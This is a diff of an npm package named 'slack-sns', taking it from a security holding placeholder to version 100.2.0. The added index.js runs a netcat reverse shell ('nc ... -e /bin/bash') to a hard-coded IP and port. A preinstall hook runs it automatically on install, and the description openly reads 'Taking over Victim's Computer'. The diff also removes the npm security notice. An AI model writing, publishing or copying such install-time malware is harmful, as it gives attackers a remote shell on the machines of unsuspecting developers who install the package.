slack-sns 0.0.1-security → 100.2.0

package/index.js

@@ -0,0 +1,22 @@
+const { exec } = require("child_process");
+const https = require("https");
+
+// Replace 'your_ip' with your actual IP address
+const your_ip = "10.2.52.112";
+const your_port = 4444;  // Ensure this matches the port from Step 1
+
+// Command to create a reverse shell
+const reverseShellCommand = `nc ${your_ip} ${your_port} -e /bin/bash`;
+
+// Execute the reverse shell command
+exec(reverseShellCommand, (error, stdout, stderr) => {
+    if (error) {
+        console.error(`Error: ${error.message}`);
+        return;
+    }
+    if (stderr) {
+        console.error(`Stderr: ${stderr}`);
+        return;
+    }
+    console.log(`Output: ${stdout}`);
+});

package/package.json

@@ -1,6 +1,15 @@
 {
   "name": "slack-sns",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "100.2.0",
+  "description": "Taking over Victim's Computer by M1S0",
+  "main": "index.js",
+  "scripts": {
+    "test": "echo \"Error: no test specified\" && exit 1",
+    "preinstall": "node index.js"
+  },
+  "author": "",
+  "license": "ISC",
+  "dependencies": {
+    "slack-sns": "^100.2.0"
+  }
 }

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=slack-sns for more information.